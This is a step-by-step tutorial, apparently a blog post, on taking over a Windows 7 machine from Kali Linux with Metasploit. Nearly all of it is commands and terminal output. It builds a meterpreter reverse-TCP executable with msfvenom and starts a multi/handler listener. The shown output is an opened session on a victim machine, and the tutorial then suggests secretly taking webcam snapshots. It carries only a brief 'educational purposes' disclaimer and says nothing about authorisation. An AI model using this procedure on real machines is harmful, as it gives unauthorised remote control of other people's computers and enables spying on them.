Quick Start Guide: How to Hack Windows with Kali Linux

Kali Linux is derived from Debian Linux and is mainly used for infiltration. It has over 300 penetration testing programs pre-installed. It is supported by the Metasploit Framework in the Metasploit project, a tool for developing and executing exploits. Let’s start by hacking Windows with Kali Linux. It is worth noting that we are writing this post for educational purposes only.
[*]

[*]Original machine details:

[*]Kali Linux

[email protected]:/# uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
[email protected]:/#

[*]

[*]Target machine used for hacking:

Windows 7 Ultimate SP1

[*]

[*]Step 1 … Load creation

[*]Payload is a program that is similar to a virus or a trojan that runs on a remote machine for the purpose of hacking. To create the payload, the commands written below are used, which will hack windows with Kali Linux

	
[email protected]:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
[email protected]:/# ls -la /root/program.exe
-rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe

[*]

[*]We used the ls command to confirm that our Payload program was successfully created at the specified location.

[*]Step 2: Run the mfsconsole command, which will run an msf query.

[email protected]:# msfconsole
 
 
                                   .,,.                  .
                                .$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .
 
 
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit
 
       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
 
msf >

[*]

[*]Step 3: For use, we used the following parts:

  • Port 4444: you can use as your choice
  • LHOST IP: IP 192.168.189.128 with Kali Linux. You can find out the IP that your machine is using using the Kali command.
[email protected]:/# ip r l
192.168.189.0/24 dev eth0  proto kernel  scope link  src 192.168.189.128  metric 100
[email protected]:/#

[*]

[*]Now give the following command on the msf line “use exploit / multi / handler”

msf > use exploit/multi/handler
msf exploit(handler) >

[*]

[*]Then issue the command “set payload windows / meterpreter / reverse_tcp” on the following line:

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

[*]

[*]Now set your local IP and port using lhost and lport command as shown below:

msf exploit(handler) > set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit(handler) > set lport 4444
lport => 4444

[*]

[*]and finally use the command.

msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...

[*]

[*]Now you need to execute the command “program.exe” on the Windows machine, once it is executed on the target machine, you can be able to set up a meterpreter session. Just type SysInfo to get the details of the compromised Windows machine.

msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000
 
meterpreter > sysinfo
Computer        : MANN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_IN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32

[*]

[*]After you have successfully received the parts, you can do more in use or get more information with the command “help“Which will show all the options with which you can hack the system, for example, you can execute the webcam snap command“ webcam_snap ”in the same way as you can use many of the available options. Happy hacking !!!!

Sidebar